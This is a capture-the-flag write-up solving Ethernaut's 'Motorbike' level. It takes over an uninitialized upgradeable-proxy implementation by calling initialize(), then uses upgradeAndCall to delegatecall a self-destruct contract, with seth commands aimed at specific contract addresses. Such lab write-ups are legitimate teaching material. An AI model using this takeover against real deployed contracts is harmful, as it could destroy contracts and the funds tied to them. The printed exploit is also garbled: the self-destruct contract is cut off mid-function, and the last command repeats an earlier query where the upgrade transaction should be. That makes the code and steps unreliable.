In the past I have gone over all Ethernaut challenges, but it’s good to see that more are still being made. Let’s see how we can manage to solve this one.

The challenge text is: “Ethernaut’s motorbike has a brand new upgradable engine design. Would you be able to selfdestruct its engine and make the motorbike unusable?”

We are presented with one file containing two contracts, the “motorbike” contract and the “engine” contract. Our objective is to make the “engine” contract somehow self destruct.

Having a look at the Engine contract we don’t see any existing code that can call selfdestruct however the contract is able to make delegated calls, so if we can find a way to have theEngine contract make a delegated call to a contract that we choose, we can complete the objective.

The only way to make a delegated call is through the function upgradeAndCall(), but that does a check through the function _authorizeUpgrade() to ensure that the caller is upgrader. That’s a shame, because the contract would surely already be initialized… right?

Let’s have a check anyways just to be sure. First we have to find out the contract address of the Engine contract, because Ethernaut only tells us the address of the Motorbike contract. To do this we can check the storage slot at _IMPLEMENTATION_SLOT.

dev@dev:~/dev/ctf/ethernaut$ seth storage 0xaF6Ebc43FA73B9859e95Fa537526A67989d48882 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc

We have the address of the Engine contract, so now let’s see if upgrader is set.

dev@dev:~/dev/ctf/ethernaut$ seth call 0x32e5c3b3c6c402ceb7df4e4f530fd2b94154f61c 'upgrader()'

upgrader isn’t set, so that means the contract hasn’t been initialized, which in turn means that we can be the ones to initialize it ourselves. Let’s initialize the contract.

dev@dev:~/dev/ctf/ethernaut$ seth send 0x32e5c3b3c6c402ceb7df4e4f530fd2b94154f61c 'initialize()'

Now that our address is upgrader, we are able to call the function upgradeAndCall() which means we can run delegated calls on contracts of our choosing. Let’s deploy a contract that is able to self destruct.

// SPDX-License-Identifier: MIT

pragma solidity 0.8.6;

contract SelfDestruct {
        function die() external {

With this contract, all we have to do now is pass it to upgradeAndCall() along with the data necessary to call the die() function.

dev@dev:~/dev/ctf/ethernaut$ seth sig "die()"
dev@dev:~/dev/ctf/ethernaut$ seth call 0x32e5c3b3c6c402ceb7df4e4f530fd2b94154f61c 'upgrader()'

At this point, you can submit the challenge and you will pass.